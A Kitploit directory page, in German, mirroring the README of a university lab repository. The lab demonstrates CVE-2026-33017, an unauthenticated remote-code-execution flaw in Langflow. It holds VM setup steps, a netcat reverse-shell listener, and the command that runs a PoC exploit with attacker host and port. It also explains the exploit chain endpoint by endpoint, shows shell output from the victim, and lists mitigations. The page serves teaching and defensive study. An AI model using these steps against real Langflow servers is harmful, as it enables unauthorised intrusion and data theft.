Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-33017 — # Bildungslabor zur Demonstration von nicht authentifiziertem RCE in Langflow über CVE-2026-33017, mit automatisiertem VM-Setup und einem PoC-Exploit für eine Reverse Shell. | Kitploit
Tools/GitHubGitHub/jorrit-vm/cve-2026-33017
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingRemote-Access-ToolPayload-EntwicklungLabs & Praxis
GitHubjorrit-vm/cve-2026-33017

CVE-2026-33017

# Bildungslabor zur Demonstration von nicht authentifiziertem RCE in Langflow über CVE-2026-33017, mit automatisiertem VM-Setup und einem PoC-Exploit für eine Reverse Shell.

1vor 3 MonatenNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-33017 — Langflow Unauthenticated RCE

HoGent CyberSecurity II — Netwerk Pentesting & Exploitatie (NPE)
Academiejaar 2025–2026

CVE CVSS Langflow


Überblick

Dieses Repository enthält eine vollständige Laborumgebung und Exploit-Demonstration von CVE-2026-33017, einer kritischen unauthentifizierten Remote Code Execution (RCE)-Schwachstelle in Langflow ≤ 1.8.1.

Ein Angreifer ohne jegliche Authentifizierung kann beliebigen Python-Code auf dem Server über den Endpunkt /api/v1/build_public_tmp/{flow_id}/flow ausführen, da Benutzereingaben direkt an Pythons exec() ohne Sandboxing oder Validierung übergeben werden.

⚠️ Haftungsausschluss: Dieses Repository dient ausschließlich Bildungszwecken in einer kontrollierten Laborumgebung. Verwenden Sie es nur auf Systemen, für die Sie eine ausdrückliche Genehmigung haben.


Architektur

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                   HOST MACHINE                      │
│                                                     │
│  ┌──────────────────┐     ┌───────────────────────┐ │
│  │  Langflow-Victim │     │    Kali-Attacker      │ │
│  │  Ubuntu 22.04    │     │    Kali Linux         │ │
│  │  192.168.56.101  │◄────│    192.168.56.100     │ │
│  │  Langflow 1.8.1  │     │    PoC exploit tool   │ │
│  │  port 7860       │     │    + internet (NAT)   │ │
│  └──────────────────┘     └───────────────────────┘ │
│          Host-only netwerk: 192.168.56.0/24         │
└─────────────────────────────────────────────────────┘

Repository-Struktur

root@kitploit:~
CVE-2026-33017/
├── README.md # Dieses Dokument
├── LICENSE
├── .gitignore
├── docs/
│ └── stappenplan.md # Vollständige Deployment- & Angriffsanleitung
└── scripts/
├── setup_vms.sh # Phase 1: VirtualBox-VMs erstellen (HOST)
├── setup_victim.sh # Phase 2: Langflow 1.8.1 installieren (Ubuntu-VM)
└── setup_attacker.sh # Phase 3: PoC-Tool installieren (Kali-VM)

Schnellstart

Voraussetzungen

  • VirtualBox 7.x mit VBoxManage im PATH
  • Ubuntu_22.04-VB-64bit.vdi → umbenennen in ubuntu-22.04.vdi
  • Kali_Linux-VB-64bit.vdi → umbenennen in kali-linux.vdi
  • Beide VDI-Dateien im selben Ordner wie setup_vms.sh

Phase 1 — VMs erstellen (auf dem Host)

root@kitploit:~
bash scripts/setup_vms.sh

Phase 2 — Victim-VM konfigurieren (auf der Ubuntu-VM)

root@kitploit:~
# Anmeldedaten: osboxes / osboxes.org
sudo bash scripts/setup_victim.sh

Phase 3 — Attacker-VM konfigurieren (auf der Kali-VM)

root@kitploit:~
# Anmeldedaten: osboxes / osboxes.org
sudo bash scripts/setup_attacker.sh

Angriff ausführen

Terminal 1 — Reverse-Shell-Listener:

root@kitploit:~
nc -lvnp 4444

Terminal 2 — Exploit:

root@kitploit:~
cd ~/CVE-2026-33017-Langflow-RCE-PoC
source venv/bin/activate
python3 cve-2026-33017.py 192.168.56.101 --shell \
  --lhost 192.168.56.100 --lport 4444

Der PoC wird automatisch von setup_attacker.sh installiert.
Verwendeter PoC: omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC


Wie der Exploit funktioniert

SchrittEndpointBeschreibung
1GET /api/v1/auto_loginRuft Superuser-JWT-Token ab (AUTO_LOGIN=true)
2POST /api/v1/flows/Erstellt neuen öffentlichen Flow über die API
3POST /api/v1/build_public_tmp/{id}/flowInjiziert CustomComponent mit bösartigem Python-Code
4exec() in validate.py:397Code wird ohne Sandboxing ausgeführt — RCE

Ausführungsnachweis

[] Fetching access token... [+] Public Flow ID created: 11571add-6416-4226-b8e6-844202cce6ff [] Sending reverse shell to connect back to 192.168.56.100:4444

Listener (Terminal 1): connect to [192.168.56.100] from (UNKNOWN) [192.168.56.101] 36160 $ whoami user $ hostname e37190a2f147 $ find /app -name "*.db" /app/.venv/lib/python3.12/site-packages/langflow/langflow.db


Mitigation

  • Update auf Langflow ≥ 1.9.0 — entfernt den verwundbaren data-Parameter
  • Deaktivieren Sie LANGFLOW_AUTO_LOGIN in der Produktion
  • Beschränken Sie den Netzwerkzugriff auf Port 7860 über die Firewall
  • Platzieren Sie Langflow hinter einem authentifizierenden Reverse-Proxy

Referenzen

  • NVD — CVE-2026-33017
  • GitHub Advisory GHSA-vwmf-pq79-vjvx
  • Sysdig — Exploited in 20 hours
  • SonicWall — Technical Analysis
  • PoC von omer-efe-curkus

HoGent — Toegepaste Informatica — CyberSecurity II — 2025–2026

Tool herunterladen